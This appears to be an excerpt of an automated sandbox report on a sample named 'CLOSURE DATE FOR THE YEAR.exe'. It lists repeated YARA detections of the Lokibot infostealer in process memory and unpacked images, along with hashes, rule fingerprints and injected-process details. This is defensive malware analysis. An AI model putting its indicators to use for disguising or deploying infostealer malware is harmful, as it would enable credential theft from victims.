                Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 7996, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: IOsbBBIDAm.exe PID: 8056, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_007923700_2_00792370
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_00790F400_2_00790F40
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_00792C980_2_00792C98
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_007937A80_2_007937A8
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_0738A7000_2_0738A700
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_073896580_2_07389658
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_073884C00_2_073884C0
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_073880880_2_07388088
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_07389D000_2_07389D00
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_0738BD610_2_0738BD61
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_07389CEF0_2_07389CEF
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_073898C80_2_073898C8
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeCode function: 0_2_07AE00400_2_07AE0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040549C8_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004029D48_2_004029D4
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A23709_2_025A2370
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A0F409_2_025A0F40
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A22679_2_025A2267
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A228A9_2_025A228A
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A0E799_2_025A0E79
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A0ED89_2_025A0ED8
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A2C989_2_025A2C98
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A2C889_2_025A2C88
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A37699_2_025A3769
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeCode function: 9_2_025A37A89_2_025A37A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8056 -s 1768
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: invalid certificate
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1758814861.0000000007B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1755400023.0000000003D11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1753532867.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1754216796.00000000024D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1757968547.00000000072F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000000.1656803047.00000000000B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAYyv.exe: vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1760516309.0000000009470000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1755400023.0000000003CD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exeBinary or memory string: OriginalFilenameAYyv.exe: vs CLOSURE DATE FOR THE YEAR.exe
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 7996, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
